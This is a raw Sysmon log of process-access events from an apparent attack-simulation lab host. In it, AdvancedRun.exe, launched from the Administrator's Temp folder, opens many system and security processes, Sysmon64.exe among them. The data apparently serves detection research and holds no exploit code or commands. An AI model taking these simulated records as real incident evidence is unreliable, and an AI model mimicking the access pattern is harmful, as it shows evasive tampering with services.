18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 